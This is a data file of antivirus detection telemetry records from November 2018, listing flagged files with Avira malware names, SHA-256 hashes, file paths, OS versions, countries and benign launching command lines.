  Row(detection=Row(filename='avscan-20181102-061735-f611fb64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F611FB64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054933-0b6fa86a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054933-0B6FA86A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051633-6f0bdd64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051633-6F0BDD64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061933-3c7629d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061933-3C7629D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055115-47f9b406', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055115-47F9B406', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061127-1a9b8de5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061127-1A9B8DE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061906-2c5d2da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061906-2C5D2DA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052115-1748a3fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052115-1748A3FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062659-462cd1de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062659-462CD1DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055403-ac2b771d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055403-AC2B771D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051144-c2f0af0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051144-C2F0AF0A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055717-1fc30c61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055717-1FC30C61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062433-eed18140', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062433-EED18140', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052030-fc446e51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052030-FC446E51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050806-40cdbc91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050806-40CDBC91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051410-1a108152', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051410-1A108152', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062113-77def0d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062113-77DEF0D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053840-85d700a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053840-85D700A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054306-2498d429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054306-2498D429', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055714-1df65788', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055714-1DF65788', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062409-e0832286', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062409-E0832286', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052602-c2524f49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052602-C2524F49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:27:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051802-a3ed0f98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051802-A3ED0F98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055420-b61d60ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055420-B61D60AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='7e59ec1097acb9cbb852cf8ed34c754f9d8f2d9d27c6dd1ae4d718bd0a18dd15', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T13:36:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053407-e31c9e26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053407-E31C9E26', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050536-e78b7cf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050536-E78B7CF8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054849-f1422c73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054849-F1422C73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055106-42fb177f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055106-42FB177F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052043-03dfbb1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052043-03DFBB1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='http:\\\\\\/\\\\\\/www.reimageplus.com\\\\\\/GUI\\\\\\/GUI1880\\\\\\/layout.php?consumer=1&gui_branch=0&trackutil=4139179281&MinorSessionID=6b8e916838a040318122dd809f&lang_code=en&bundle=0  \\\\\\/cil=DISABLED \\\\\\/Close=0 \\\\\\/Locale=1033 \\\\\\/Product:reimage', country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Reimage\\Reimage Repair\\Reimage.exe', parentsize=9124200, timestamp='2018-11-01T09:19:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe18_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe18 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:15:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wspsetup (1).exe', filepath='C:\\Users\\X\\Downloads\\wspsetup (1).exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T14:36:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155054-8e2d5a1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155054-8E2D5A1B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154640-6381a94f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154640-6381A94F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155505-b87168de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155505-B87168DE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='029a66c12710dd68353483526f9f9595fcfd21be952567e36835053f35ecb993.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\16.03.2018-195.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\029a66c12710dd68353483526f9f9595fcfd21be952567e36835053f35ecb993.MRG', filesize=704000, name='TR/Crypt.XPACK.Gen5.#M300.#R400496'), hash='029a66c12710dd68353483526f9f9595fcfd21be952567e36835053f35ecb993', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.04.2018-108.categorized\\\\\\\\unpacked -PERHASH', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-01T13:33:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mcu.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PERSIAPAN AUDIT\\MCU\\MCU.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160044-f18cfda4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160044-F18CFDA4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='rtp', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1609728, timestamp='2018-11-01T17:27:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160144-fbb0b3b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160144-FBB0B3B6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh9960', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH9960', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:42:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231744-0ebbde2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e05eca8a\\AVSCAN-20181101-231720-0BD7B32B\\AVSCAN-20181101-231744-0EBBDE2B', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0bacb1e5fd958ad0346be3a7500eaa97e2e21a35a98695f9af103d52ed4e0208', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\0BACB1E5FD958AD0346BE3A7500EAA97E2E21A35A98695F9AF103D52ED4E0208', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bacb1e5fd958ad0346be3a7500eaa97e2e21a35a98695f9af103d52ed4e0208', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:03:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T12:12:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T14:25:48Z'), dt=datetime.date(2018, 11, 1)),
